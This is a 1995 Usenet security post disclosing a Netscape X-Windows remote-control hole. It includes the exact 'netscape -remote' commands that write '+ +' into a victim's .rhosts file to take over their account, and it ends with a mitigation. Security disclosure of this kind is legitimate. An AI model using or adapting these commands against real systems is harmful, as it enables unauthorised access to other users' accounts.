Article 30114 of alt.security:
Path: nntpd.lkg.dec.com!crl.dec.com!crl.dec.com!bloom-beacon.mit.edu!gatech!news.mathworks.com!tank.news.pipex.net!pipex!oleane!jussieu.fr!nef.ens.fr!news
From: "Denis Auroux (MXK)" <auroux@clipper.ens.fr>
Newsgroups: alt.security,comp.security.unix
Subject: Netscape hole without .Xauthority
Date: 27 Sep 1995 23:00:29 GMT
Organization: Ecole Normale Superieure
Lines: 50
Message-ID: <44cl2d$s9h@nef.ens.fr>
NNTP-Posting-Host: ppp-6.ens.fr
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1.1N (X11; I; Linux 1.1.18 i486)
X-URL: news:alt.sb.programmer
Xref: nntpd.lkg.dec.com alt.security:30114 comp.security.unix:20277

There's a huge hole in the Netscape remote control mechanism for the
X-Windows based clients. 
Potential impact : anybody can become any user that uses Netscape on any
system without sufficient X security.

Let's suppose that you have an account on a target machine, where somebody
is using Netscape, and either the xhost checking is disabled, or you can
set the xhost yourself (e.g. if you have an account and the target user has
no .Xauthority, as is frequent in university computer rooms).
Then you can gain access to the target user's account using the following
steps :

- make a text file containing only "+ +" accessible (as file, as URL, or
  whatever you like) to the target Netscape client. This is quite easy, either
  if you have a personal WWW page (http://... URL) or an account on the
  target machine (file://... URL), or even by uploading it to an anon FTP

- set your DISPLAY environment variable to the target display

- run the following set of commands :

  netscape -noraise -remote "openURL(<put-your-URL-here>)"
  netscape -noraise -remote "saveAs(.rhosts)"
  netscape -noraise -remote back

In the second command, the path should be specified whenever possible 
(~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that
precise moment, then the chances are it worked !

Solution to the problem : every user concerned should either create a 
Xauthority file, or stop using Netscape.

	MXK


PS: WHY do they bother with PGP and RSA security when they keep such holes ????

+------------------------------------+---------------------------------+
|  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
|  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
|  75005 PARIS FRANCE                | 75005 PARIS                     |
|  email: auroux@clipper.ens.fr      | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+